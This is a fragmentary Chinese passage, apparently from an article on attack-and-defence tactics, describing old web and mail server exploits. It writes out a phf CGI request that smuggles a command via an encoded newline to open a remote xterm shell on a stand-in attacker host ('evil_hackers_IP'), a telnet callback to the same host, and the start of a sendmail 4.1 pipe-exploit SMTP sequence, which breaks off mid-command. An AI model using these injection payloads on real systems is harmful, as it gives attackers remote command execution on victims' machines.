%20/bin/telnet%20evil_hackers_ip%2025
当然,我们还可以结合xterm终端工具和X服务器原理,而制造如下请求:
/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil_hackers_IP:0.0,这个请求将会在攻击者的显示屏幕上弹出一个xterm,提供了受害者的shell命令界面给予操作。 **邮件的几个问题
曾经流行一时的sendmail 4.1漏洞就在于通过管道方式,攻击者可以直接以特权方式执行命令(命令行顺序输入如下指令):
Telnet smtpwww.victim.com 25
helo
mail from:
关键词:战术攻防思维撷粹